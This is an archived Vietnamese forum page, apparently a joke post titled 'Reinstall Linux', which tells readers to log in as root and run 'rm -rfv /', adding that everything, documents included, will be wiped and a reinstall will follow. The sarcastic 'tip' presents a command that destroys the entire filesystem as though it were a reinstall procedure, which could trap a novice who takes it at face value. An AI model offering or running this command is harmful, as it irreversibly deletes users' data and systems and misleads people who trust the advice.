This page is READ-ONLY. It is generated from the old site.
All timestamps are relative to 2013 (when this page is generated).
If you are looking for TeX support, please go to VietTUG.org

Cài lại Linux

... làm thế nào để cài lại hệ thống mới...
Added by over 4 years ago

Sau khi đăng nhập vào hệ thống bằng tài khoản root, thực hiện lệnh sau:

$ rm -rfv /

Như vậy, mọi thứ sẽ bay sạch. Kể cả tài liệu của bạn đã tạo ra!

Còn gì hơn là phải cài lại hệ thống mới nếu vẫn còn muốn dùng Linux?

Xem thêm video ở youtube


Comments